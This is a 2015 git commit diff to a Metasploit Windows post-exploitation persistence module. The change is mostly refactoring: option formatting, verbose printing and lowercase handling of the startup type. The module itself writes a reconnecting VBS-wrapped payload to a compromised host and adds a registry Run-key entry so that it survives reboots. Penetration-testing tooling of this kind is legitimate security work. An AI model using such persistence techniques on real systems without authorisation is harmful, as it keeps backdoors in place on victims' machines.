persistence - better ruby/msf fu

g0tmi1k · g0tmi1k · commit 0b55a889d31a · 2015-06-18T21:10:16.000+01:00
diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
@@ -31,51 +31,50 @@ def initialize(info={})
       'License'       => MSF_LICENSE,
       'Author'        =>
         [
-          'Carlos Perez <carlos_perez[at]darkoperator.com>'
+          'Carlos Perez <carlos_perez[at]darkoperator.com>',
+          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
         ],
       'Platform'      => [ 'win' ],
       'SessionTypes'  => [ 'meterpreter' ],
       'Targets'       => [ [ 'Windows', {} ] ],
       'DefaultTarget' => 0,
       'DisclosureDate'=> "Oct 19 2011",
-      'DefaultOptions' =>
+      'DefaultOptions'=>
         {
           'DisablePayloadHandler' => 'true',
         }
     ))
 
-    register_options(
-      [
-        OptInt.new('DELAY',
-          [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
-        OptEnum.new('STARTUP',
-          [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
-        OptString.new('VBS_NAME',
-          [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
-        OptString.new('EXE_NAME',
-          [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
-        OptString.new('REG_NAME',
-          [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
-        OptString.new('PATH',
-          [false, 'Path to write payload (%TEMP% by default).', nil]),
-      ], self.class)
+    register_options([
+      OptInt.new('DELAY',
+        [true, 'Delay (in seconds) for persistent payload to keep reconnecting back.', 10]),
+      OptEnum.new('STARTUP',
+        [true, 'Startup type for the persistent payload.', 'USER', ['USER','SYSTEM']]),
+      OptString.new('VBS_NAME',
+        [false, 'The filename to use for the VBS persistent script on the target host (%RAND% by default).', nil]),
+      OptString.new('EXE_NAME',
+        [false, 'The filename for the payload to be used on the target host (%RAND%.exe by default).', nil]),
+      OptString.new('REG_NAME',
+        [false, 'The name to call registry value for persistence on target host (%RAND% by default).', nil]),
+      OptString.new('PATH',
+        [false, 'Path to write payload (%TEMP% by default).', nil])
+    ], self.class)
 
     register_advanced_options([
       OptBool.new('HANDLER',
         [ false, 'Start an exploit/multi/handler job to receive the connection', false]),
       OptBool.new('EXEC_AFTER',
         [ false, 'Execute persistent script after installing.', false])
-      ], self.class)
+    ], self.class)
   end
 
   # Exploit method for when exploit command is issued
   def exploit
-    print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
-
     # Define default values
     rvbs_name = datastore['VBS_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     rexe_name = datastore['EXE_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
     reg_val   = datastore['REG_NAME'] || Rex::Text.rand_text_alpha((rand(8)+6))
+    startup   = datastore['STARTUP'].downcase
     delay = datastore['DELAY'] || 10
     exc_after = datastore['EXEC_AFTER'] || false
     handler = datastore['HANDLER'] || false
@@ -87,13 +86,14 @@ def exploit
     # Connect to the session
     begin
       host, port = session.session_host, session.session_port
+      print_status("Running persistent module against #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}")
     rescue => e
       print_error("Could not connect to session")
       return nil
     end
 
     # Check values
-    if (is_system?) && (datastore['STARTUP'] == 'USER')
+    if (is_system?) && (startup == 'user')
       print_warning('Note: Current user is SYSTEM & STARTUP == USER. This user may not login often!')
     end
 
@@ -105,31 +105,30 @@ def exploit
     end
 
     # Generate the exe payload
-    print_status("Generating EXE payload (#{rexe_name})") if datastore['VERBOSE']
+    vprint_status("Generating EXE payload (#{rexe_name})")
     exe = generate_payload_exe
     # Generate the vbs payload
-    print_status("Generating VBS persistent script (#{rvbs_name})") if datastore['VERBOSE']
+    vprint_status("Generating VBS persistent script (#{rvbs_name})")
     vbsscript = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay, :exe_filename => rexe_name})
     # Writing the payload to target
-    print_status("Writing payload inside the VBS script on the target") if datastore['VERBOSE']
+    vprint_status("Writing payload inside the VBS script on the target")
     script_on_target = write_script_to_target(vbsscript, rvbs_name)
-
     # Exit the module because we failed to write the file on the target host
     # Feedback has already been given to the user, via the function.
     return unless script_on_target
 
     # Initial execution of persistent script
-    case datastore['STARTUP']
-    when 'USER'
+    case startup
+    when 'user'
       # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKCU", script_on_target, reg_val)
-      print_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on") if datastore['VERBOSE']
-    when 'SYSTEM'
+      vprint_status("Payload will execute when USER (#{session.sys.config.getuid}) next logs on")
+    when 'system'
       # If we could not write the entry in the registy we exit the module.
       return unless write_to_reg("HKLM", script_on_target, reg_val)
-      print_status("Payload will execute at the next SYSTEM startup") if datastore['VERBOSE']
+      vprint_status("Payload will execute at the next SYSTEM startup")
     else
-      print_error("Something went wrong. Invalid STARTUP method: #{datastore['STARTUP']}")
+      print_error("Something went wrong. Invalid STARTUP method: #{startup}")
       return nil
     end
 
@@ -147,7 +146,7 @@ def exploit
     # Create 'clean up' resource file
     clean_rc = log_file()
     file_local_write(clean_rc, @clean_up_rc)
-    print_status("Clean up Meterpreter .RC file: #{clean_rc}")
+    print_status("Clean up Meterpreter RC file: #{clean_rc}")
 
     report_note(:host => host,
       :type => "host.persistance.cleanup",
@@ -183,6 +182,7 @@ def write_script_to_target(vbs, name)
         print_good("Deleted #{filepath}")
       rescue
         print_error("Unable to delete file!")
+        return nil
       end
     end
 
